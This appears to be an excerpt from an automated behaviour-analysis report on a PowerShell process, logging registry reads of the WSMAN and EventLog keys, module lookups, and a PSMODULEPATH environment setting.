Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn

Module (2)

Operation	Additional Information	Success	Count	Logfile
Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe		1	Fn
Enumerate	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe		1	Fn

System (6)

Operation	Additional Information	Success	Count	Logfile

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Set Environment String	name = PSMODULEPATH, value = C:\Users\hJrD1KOKY DS8lUjv\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\		1	Fn